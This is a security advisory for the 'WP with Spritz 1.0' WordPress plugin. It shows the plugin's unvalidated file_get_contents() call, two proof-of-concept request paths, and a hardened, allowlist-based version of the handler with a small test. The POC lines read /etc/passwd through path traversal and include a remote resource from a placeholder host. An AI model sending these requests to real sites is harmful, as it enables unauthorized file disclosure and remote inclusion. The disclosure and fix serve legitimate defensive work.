WordPress Plugin WP with Spritz 1.0 – Remote File Inclusion

Authors: Wadeek
Risk: High
CVE: NO
0day: Remote File Inclusion
0day-id: 0DAY-176104
Date: 2018-04-27

Overview

WP with Spritz lets your readers read more of your content quicker than ever using Spritz patented speed reading technology.

Enable your readers to read and retain your content like never before!

Version Disclosure

/wp-content/plugins/wp-with-spritz/readme.txt

Source Code

if (isset($_GET['url'])) {
    // The request's 'url' parameter is passed to file_get_contents() without any validation
    $content = file_get_contents($_GET['url']);
}

POC

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec
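
A hardened form of the handler shown under Source Code, as an added example that is not the plugin's own code or an official patch: it accepts only http(s) URLs whose host is on an allowlist, so both request shapes listed under POC are refused before file_get_contents() is reached. The ALLOWED_HOSTS value and the spritz_* function names are assumptions made for this illustration.

```php
<?php
// Added example, not the plugin's code. The allowlist is an assumed, constructed value.
const ALLOWED_HOSTS = ['blog.example.com'];

// Return the URL if it is safe to fetch, or null if it must be refused.
function spritz_validate_url($raw): ?string
{
    if (!is_string($raw) || $raw === '') {
        return null;                     // also rejects array input such as url[]=x
    }
    $parts = parse_url($raw);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;                     // bare filesystem paths have no scheme or host
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;                     // refuses file://, php://, data://, ftp:// ...
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;                     // no embedded credentials
    }
    if (!in_array(strtolower($parts['host']), ALLOWED_HOSTS, true)) {
        return null;                     // host must be explicitly allowed
    }
    return $raw;
}

// Fetch an already-validated URL without following redirects off the allowlist.
function spritz_fetch(string $url): ?string
{
    $ctx = stream_context_create(['http' => ['follow_location' => 0, 'timeout' => 5]]);
    $body = @file_get_contents($url, false, $ctx);
    return $body === false ? null : $body;
}

// Request handling: validate first, fetch only on success.
if (isset($_GET['url'])) {
    $url = spritz_validate_url($_GET['url']);
    if ($url === null) { http_response_code(400); exit('Invalid url parameter'); }
    $content = spritz_fetch($url);
}

// Command-line check with constructed inputs (the two POC shapes plus one allowed URL).
if (PHP_SAPI === 'cli') {
    foreach (['/../../../..//etc/passwd', 'https://domain/exec',
              'https://blog.example.com/2018/04/post/'] as $s) {
        printf("%-42s %s\n", $s, spritz_validate_url($s) === null ? 'rejected' : 'allowed');
    }
}
```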
